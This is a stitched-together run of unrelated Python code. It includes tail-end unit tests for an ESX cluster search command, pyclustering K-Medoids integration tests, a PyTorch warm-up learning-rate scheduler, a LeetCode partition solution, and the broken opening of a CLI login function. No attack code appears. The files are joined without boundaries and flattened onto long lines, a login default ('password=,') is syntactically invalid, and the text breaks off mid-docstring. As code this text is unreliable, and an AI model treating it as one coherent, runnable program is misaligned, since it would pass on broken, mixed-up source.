host-does-not-exist.aqd-unittest.ms.com " "not found", command) # TODO we have an almost duplicate def testdomainavailable(self): command = "search cluster --cluster_type esx --domain unittest" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, 
"utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # def testdomainunavailable(self): # command = ['search', 'cluster', '--cluster_type', 'esx', # '--domain', 'domain-does-not-exist'] # out = self.notfoundtest(command) # self.matchoutput(out, "Domain domain-does-not-exist not found.", # command) def testarchetypeavailable(self): command = "search cluster --cluster_type esx --archetype esx_cluster" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # def testarchetypeunavailable(self): # command = ['search', 'cluster', '--cluster_type', 'esx', # '--archetype', 'archetype-does-not-exist'] # out = self.notfoundtest(command) # self.matchoutput(out, "Archetype archetype-does-not-exist not found", # command) # TODO we have similar test def testpersonalityavailable(self): command = "search cluster --cluster_type esx --personality vulcan-10g-server-prod" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # TODO we have similar test def testpersonalityavailable2(self): command = ["search_cluster", "--cluster_type=esx", "--archetype=esx_cluster", "--personality=vulcan-10g-server-prod"] out = self.commandtest(command) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # def testpersonalityunavailable(self): # # Will only get this error if archetype is specified # command = ["search_cluster", "--cluster_type=esx", # "--archetype=vmhost", # "--personality=personality-does-not-exist"] # out = self.notfoundtest(command) # self.matchoutput(out, "Personality personality-does-not-exist, " # "archetype vmhost not found.", command) # def testpersonalityunavailable2(self): # # Will only get an error if archetype is specified # command = ['search', 'cluster', '--cluster_type', 'esx', # '--personality', 'personality-does-not-exist'] # self.noouttest(command) def testall(self): command = "search cluster --cluster_type esx" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) def testallfull(self): command = "search cluster --cluster_type esx --fullinfo" out = self.commandtest(command.split(" ")) # This is a good sampling, but not the full output self.matchoutput(out, "ESX Cluster: utecl1", command) self.matchoutput(out, "ESX Cluster: utecl2", command) self.matchoutput(out, "ESX Cluster: utecl3", command) self.matchoutput(out, "ESX Cluster: utecl4", command) self.matchoutput(out, "Metacluster: utmc1", command) self.matchoutput(out, "Metacluster: utmc2", command) self.matchoutput(out, "Building: ut", command) def testserviceavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--service', 'esx_management_server'] out = self.commandtest(command) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testserviceunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--service', 'service-does-not-exist'] out = self.notfoundtest(command) 
self.matchoutput(out, "Service service-does-not-exist not found", command) def testserviceinstanceavailable(self): command = ["search_cluster", "--cluster_type=esx", "--service=esx_management_server", "--instance=ut.a"] out = self.commandtest(command) command = ["search_cluster", "--cluster_type=esx", "--service=esx_management_server", "--instance=ut.b"] out += self.commandtest(command) # Which clusters are bound to either particular instance is # non-deterministic, but they should all be bound to one or the other. self.matchoutput(out, "utecl", command) def testserviceinstanceunavailable(self): command = ['search', 'cluster', '--cluster_type', 'esx', '--service', 'esx_management_server', '--instance', 'service-instance-does-not-exist'] out = self.notfoundtest(command) self.matchoutput(out, "Service Instance " "service-instance-does-not-exist, " "service esx_management_server not found.", command) def testinstanceavailable(self): command = "search cluster --cluster_type esx --instance ut.a" out = self.commandtest(command.split(" ")) command = "search cluster --cluster_type esx --instance ut.b" out += self.commandtest(command.split(" ")) # Which clusters are bound to either particular instance is # non-deterministic, but they should all be bound to one or the other. self.matchoutput(out, "utecl", command) def testinstanceunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--instance=service-instance-does-not-exist"] self.noouttest(command) # Kept it since the output is different from testclusterlocationavailable def testesxclusterlocationavailable(self): command = "search cluster --cluster_type esx --cluster_building ut" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchoutput(out, "utecl3", command) self.matchoutput(out, "utecl4", command) # Removed, we have duplicate # def testclusterlocationunavailable(self): # command = ["search_cluster", "--cluster_type=esx", # "--cluster_building=building-does-not-exist"] # out = self.notfoundtest(command) # self.matchoutput(out, "Building building-does-not-exist not found", # command) def testvmhostlocationavailable(self): command = "search cluster --cluster_type esx --member_rack ut10" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testvmhostlocationbuilding(self): command = "search cluster --cluster_type esx --member_building ut" out = self.commandtest(command.split(" ")) self.matchoutput(out, "utecl1", command) self.matchoutput(out, "utecl2", command) self.matchclean(out, "utecl3", command) self.matchclean(out, "utecl4", command) def testvmhostlocationunavailable(self): command = ["search_cluster", "--cluster_type=esx", "--member_rack=rack-not-exist"] out = self.notfoundtest(command) self.matchoutput(out, "Rack rack-not-exist not found", command) # TODO we have an almost duplicate, do we want this? def testbuildstatuspos(self): command = ['search_cluster', '--cluster_type=esx', '--buildstatus=build'] out = self.commandtest(command) self.matchoutput(out, "utecl4", command) def testbuildstatusneg(self): command = ['search_cluster', '--cluster_type=esx', '--buildstatus=decommissioned'] self.noouttest(command) if __name__ == '__main__': suite = unittest.TestLoader().loadTestsFromTestCase(TestSearchClusterESX) unittest.TextTestRunner(verbosity=2).run(suite) """! 
@brief Integration-tests for K-Medoids algorithm. @authors () @date 2014-2020 @copyright BSD-3-Clause """ import unittest # Generate images without having a window appear. import matplotlib matplotlib.use('Agg') from pyclustering.cluster.tests.kmedoids_templates import kmedoids_test_template from pyclustering.cluster.kmedoids import kmedoids from pyclustering.samples.definitions import SIMPLE_SAMPLES, SIMPLE_ANSWERS from pyclustering.utils import read_sample from pyclustering.utils.metric import type_metric, distance_metric from pyclustering.core.tests import remove_library class KmedoidsIntegrationTest(unittest.TestCase): def testClusterAllocationSampleSimple1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True) def testClusterAllocationSampleSimple1WrongInitials1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [1, 2, 3, 4], [2, 2, 3, 3], True) def testClusterAllocationSampleSimple1DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True, data_type='distance_matrix') def testClusterAllocationSampleSimple1EuclideanByCore(self): metric = distance_metric(type_metric.EUCLIDEAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1EuclideanDistanceMatrixByCore(self): metric = distance_metric(type_metric.EUCLIDEAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1SquareEuclideanByCore(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1SquareEuclideanDistanceMatrixByCore(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1ManhattanByCore(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1ManhattanDistanceMatrixByCore(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1ChebyshevByCore(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1ChebyshevDistanceMatrixByCore(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1MinkowskiByCore(self): metric = distance_metric(type_metric.MINKOWSKI, degree=2.0) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1MinkowskiDistanceMatrixByCore(self): metric = distance_metric(type_metric.MINKOWSKI, degree=2.0) 
kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1GowerByCore(self): metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1GowerDistanceMatrixByCore(self): metric = distance_metric(type_metric.GOWER, data=read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterAllocationSampleSimple1UserDefinedByCore(self): metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True) def testClusterAllocationSampleSimple1UserDefinedDistanceMatrixByCore(self): metric = distance_metric(type_metric.USER_DEFINED, func=distance_metric(type_metric.EUCLIDEAN)) kmedoids_test_template.templateLengthProcessWithMetric(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], metric, True, data_type='distance_matrix') def testClusterOneAllocationSampleSimple1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [5], [10], True) def testClusterOneAllocationSampleSimple1DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [5], [10], True, data_type='distance_matrix') def testClusterAllocationSampleSimple2ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [3, 12, 20], [10, 5, 8], True) def testClusterAllocationSampleSimple2DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [3, 12, 20], [10, 5, 8], True, data_type='distance_matrix') def testClusterOneAllocationSampleSimple2ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [10], [23], True) def testClusterOneAllocationSampleSimple2DistanceMatrixByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [10], [23], True, data_type='distance_matrix') def testClusterAllocationSampleSimple3ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [4, 12, 25, 37], [10, 10, 10, 30], True) def testClusterOneAllocationSampleSimple3ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [30], [60], True) def testClusterAllocationSampleSimple5ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [4, 18, 34, 55], [15, 15, 15, 15], True) def testClusterOneAllocationSampleSimple5ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [35], [60], True) def testClusterTheSameData1ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, [2, 20], [10, 20], True) def testClusterTheSameData2ByCore(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, [2, 7, 12], [5, 5, 5], True) def testClusterAllocationTheSameObjectsOneInitialMedoidByCore(self): kmedoids_test_template.templateClusterAllocationTheSameObjects(20, 1, True) def testClusterAllocationTheSameObjectsTwoInitialMedoidsByCore(self): 
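# Hedged reading of the helper used below: templateClusterAllocationTheSameObjects
# appears to build a set of identical points (first argument) and check that the
# requested number of initial medoids (second argument) still yields that many
# clusters when the C++ core is enabled (third argument).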
kmedoids_test_template.templateClusterAllocationTheSameObjects(15, 2, True) def testClusterAllocationTheSameObjectsThreeInitialMedoidsByCore(self): kmedoids_test_template.templateClusterAllocationTheSameObjects(25, 3, True) def testCoreInterfaceIntInputData(self): kmedoids_instance = kmedoids([[1], [2], [3], [20], [21], [22]], [2, 5], 0.025, True) kmedoids_instance.process() assert len(kmedoids_instance.get_clusters()) == 2 def testAllocatedRequestedClustersSampleSimple04ByCore(self): sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE4) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 10, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 25, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 40, None, True) def testAllocatedRequestedClustersWithTheSamePointsByCore(self): # Bug issue #366 - Kmedoids returns incorrect number of clusters. sample = [[0.0, 0.0], [0.1, 0.1], [0.0, 0.0], [0.1, 0.2]] kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 3, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 3, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 2, None, True) kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 1, None, True) def testAllocatedRequestedClustersWithTheSamePoints2(self): sample = [[0.23, 0.2], [-0.1, 0.1], [0.0, 0.9], [0.1, -0.2], [0.8, 0.1], [-0.1, 0.1], [-0.4, -0.2], [0.0, 0.9]] answers = [1, 2, 3, 4, 5, 6, 6, 6] for expected_amount in answers: kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, expected_amount, None, True) def testAllocatedRequestedClustersWithTotallyTheSamePointsByCore(self): # Bug issue #366 - Kmedoids returns incorrect number of clusters. 
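# Sketch of the regression guarded against here (hypothetical direct call,
# mirroring the constructor usage in testCoreInterfaceIntInputData above):
#     sample = [[0.0, 0.0]] * 4
#     instance = kmedoids(sample, [0], 0.001, True)
#     instance.process()
#     assert len(instance.get_clusters()) == 1  # exactly the requested amount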
sample = [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]] kmedoids_test_template.templateAllocateRequestedClusterAmount(sample, 1, None, True) def testProcessingWhenLibraryCoreRemoved(self): self.runRemoveLibraryCoreTest() @remove_library def runRemoveLibraryCoreTest(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True) def testItermax0(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [], True, itermax=0) def testItermax1(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True, itermax=1) def testItermax10Simple01(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [2, 9], [5, 5], True, itermax=10) def testItermax10Simple02(self): kmedoids_test_template.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [3, 12, 20], [10, 5, 8], True, itermax=10) def testSimple01AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, True, random_state=1000) def testSimple01AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, SIMPLE_ANSWERS.ANSWER_SIMPLE1, True, random_state=1000, data_type='distance_matrix') def testSimple02AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, True, random_state=1000) def testSimple02AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, SIMPLE_ANSWERS.ANSWER_SIMPLE2, True, random_state=1000, data_type='distance_matrix') def testSimple03AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, True, random_state=1000) def testSimple03AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, SIMPLE_ANSWERS.ANSWER_SIMPLE3, True, random_state=1000, data_type='distance_matrix') def testSimple04AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, SIMPLE_ANSWERS.ANSWER_SIMPLE4, True, random_state=1000) def testSimple04AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, SIMPLE_ANSWERS.ANSWER_SIMPLE4, True, random_state=1000, data_type='distance_matrix') def testSimple05AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, True, random_state=1000) def testSimple05AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, SIMPLE_ANSWERS.ANSWER_SIMPLE5, True, random_state=1000, data_type='distance_matrix') def testSimple06AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, True, random_state=1000) def testSimple06AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, SIMPLE_ANSWERS.ANSWER_SIMPLE6, True, random_state=1000, data_type='distance_matrix') def testSimple07AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, SIMPLE_ANSWERS.ANSWER_SIMPLE7, True, random_state=1000) def testSimple07AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 
SIMPLE_ANSWERS.ANSWER_SIMPLE7, True, random_state=1000, data_type='distance_matrix') def testSimple08AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, True, random_state=1000) def testSimple08AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, SIMPLE_ANSWERS.ANSWER_SIMPLE8, True, random_state=1000, data_type='distance_matrix') def testSimple09AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, SIMPLE_ANSWERS.ANSWER_SIMPLE9, True, random_state=1000) def testSimple09AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, SIMPLE_ANSWERS.ANSWER_SIMPLE9, True, random_state=1000, data_type='distance_matrix') def testSimple10AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, SIMPLE_ANSWERS.ANSWER_SIMPLE10, True, random_state=1000) def testSimple10AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, SIMPLE_ANSWERS.ANSWER_SIMPLE10, True, random_state=1000, data_type='distance_matrix') def testSimple11AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, SIMPLE_ANSWERS.ANSWER_SIMPLE11, True, random_state=1000) def testSimple11AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, SIMPLE_ANSWERS.ANSWER_SIMPLE11, True, random_state=1000, data_type='distance_matrix') def testSimple12AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, SIMPLE_ANSWERS.ANSWER_SIMPLE12, True, random_state=1000) def testSimple12AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, SIMPLE_ANSWERS.ANSWER_SIMPLE12, True, random_state=1000, data_type='distance_matrix') def testSimple13AnswerByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, SIMPLE_ANSWERS.ANSWER_SIMPLE13, True, random_state=1000) def testSimple13AnswerDistanceMatrixByCore(self): kmedoids_test_template.clustering_with_answer(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, SIMPLE_ANSWERS.ANSWER_SIMPLE13, True, random_state=1000, data_type='distance_matrix') def test_initial_medoids_sample01_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True) def test_initial_medoids_sample01_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, data_type='distance_matrix') def test_initial_medoids_sample01_wrong_amount_1_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, [4], True) def test_initial_medoids_sample01_wrong_amount_3_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 3, [4, 8, 0], True) def test_initial_medoids_sample01_wrong_amount_10_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10, [4, 8, 0, 9, 1, 7, 6, 5, 2, 3], True) def test_initial_medoids_sample01_euclidean_by_core(self): metric = distance_metric(type_metric.EUCLIDEAN) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_square_by_core(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) 
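# Added note: EUCLIDEAN_SQUARE is a monotone transform of EUCLIDEAN, so medoid
# initialization is expected to select the same indices [4, 8] for SAMPLE_SIMPLE1
# as the plain Euclidean case above; e.g. (assuming the metric is callable)
#     distance_metric(type_metric.EUCLIDEAN_SQUARE)([0, 0], [3, 4])  # 25.0 vs 5.0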
kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_square_matrix_by_core(self): metric = distance_metric(type_metric.EUCLIDEAN_SQUARE) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric, data_type='distance_matrix') def test_initial_medoids_sample01_euclidean_manhattan_by_core(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_manhattan_matrix_by_core(self): metric = distance_metric(type_metric.MANHATTAN) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric, data_type='distance_matrix') def test_initial_medoids_sample01_euclidean_chebyshev_by_core(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric) def test_initial_medoids_sample01_euclidean_chebyshev_matrix_by_core(self): metric = distance_metric(type_metric.CHEBYSHEV) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [4, 8], True, metric=metric, data_type='distance_matrix') def test_initial_medoids_sample02_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [3, 20, 14], True) def test_initial_medoids_sample02_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [3, 20, 14], True, data_type='distance_matrix') def test_initial_medoids_sample03_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, [28, 56, 5, 34], True) def test_initial_medoids_sample03_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, [28, 56, 5, 34], True, data_type='distance_matrix') def test_initial_medoids_sample04_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, [44, 7, 64, 25, 55], True) def test_initial_medoids_sample04_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, [44, 7, 64, 25, 55], True, data_type='distance_matrix') def test_initial_medoids_one_dimensional_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, [0, 20], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1, [0], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, [0, 20, 1], True) def test_initial_medoids_one_dimensional_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, [0, 20], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1, [0], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, [0, 20, 1], True, data_type='distance_matrix') def test_initial_medoids_three_dimensional_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, [15, 4], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, [15], True) kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, [15, 4, 14], True) def test_initial_medoids_three_dimensional_matrix_by_core(self): kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, [15, 
4], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, [15], True, data_type='distance_matrix') kmedoids_test_template.initialize_medoids(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, [15, 4, 14], True, data_type='distance_matrix') import torch from torch.optim.lr_scheduler import _LRScheduler LR_START = 0.00001 LR_MAX = 0.0001 LR_MIN = 0.00001 LR_RAMPUP_EPOCHS = 15 LR_SUSTAIN_EPOCHS = 3 LR_EXP_DECAY = .8 def lrfn(epoch): if epoch < LR_RAMPUP_EPOCHS: lr = (LR_MAX - LR_START) / LR_RAMPUP_EPOCHS * epoch + LR_START elif epoch < LR_RAMPUP_EPOCHS + LR_SUSTAIN_EPOCHS: lr = LR_MAX else: lr = (LR_MAX - LR_MIN) * LR_EXP_DECAY**(epoch - LR_RAMPUP_EPOCHS - LR_SUSTAIN_EPOCHS) + LR_MIN return lr class WarmUpExpLR(_LRScheduler): """warmup_training learning rate scheduler Args: optimizer: optimzier(e.g. SGD) """ def __init__(self, optimizer, last_epoch=-1): super().__init__(optimizer, last_epoch) def get_lr(self): return [lrfn(self.last_epoch)]# # @lc app=leetcode id=698 lang=python3 # # [698] Partition to K Equal Sum Subsets # # @lc code=start class Solution: def solvable(self, nums: tuple[int], groups: list[int], pos: int) -> bool: if pos == len(nums): return True for i in range(len(groups)): if groups[i] >= nums[pos]: groups[i] -= nums[pos] if self.solvable(nums, groups, pos + 1): return True groups[i] += nums[pos] return False def canPartitionKSubsets(self, nums: list[int], k: int) -> bool: target, rem = divmod(sum(nums), k) return not rem and self.solvable(tuple(sorted(nums, reverse=True)), [target] * k, 0) # @lc code=end 1-10 import base64 import json import logging import os import pickle import requests from cliff.command import Command def login(username=None, password=, domain="default"): """ This is used for configuring the authentication details the initial time the user logs in. We can also configure the domain to do the requests to. After the initial setup the user need not have to log in again. 
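Hypothetical usage (names for illustration only):
    login(username="participant", password="secret")
posts the credentials to the local EvalAI endpoint and caches the
base64-encoded token in a '.data' pickle next to this module.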
